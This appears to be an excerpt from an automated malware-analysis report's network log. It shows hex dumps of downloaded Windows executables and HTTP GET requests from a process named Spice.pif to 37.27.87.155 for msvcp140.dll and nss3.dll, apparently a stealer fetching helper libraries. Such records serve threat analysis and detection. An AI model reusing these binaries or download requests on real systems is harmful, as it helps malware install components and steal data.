2024-04-30 05:44:16 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-04-30 05:44:16 UTC	16384	IN	Data Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46 Data Ascii: A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPFLFPF
2024-04-30 05:44:16 UTC	16384	IN	Data Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1 Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
2024-04-30 05:44:16 UTC	16384	IN	Data Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}LQ
2024-04-30 05:44:16 UTC	16384	IN	Data Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07 Data Ascii: 1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
2024-04-30 05:44:16 UTC	16384	IN	Data Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
2024-04-30 05:44:16 UTC	16384	IN	Data Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4\|$
2024-04-30 05:44:17 UTC	16384	IN	Data Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$\|$K$S
2024-04-30 05:44:17 UTC	16384	IN	Data Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
2024-04-30 05:44:17 UTC	16384	IN	Data Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49721	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:17 UTC	157	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
2024-04-30 05:44:18 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:18 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-04-30 05:44:18 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-04-30 05:44:18 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-04-30 05:44:19 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-04-30 05:44:19 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-04-30 05:44:19 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-04-30 05:44:19 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-04-30 05:44:19 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-04-30 05:44:19 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
2024-04-30 05:44:19 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-04-30 05:44:19 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49722	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:20 UTC	153	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
2024-04-30 05:44:21 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:20 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
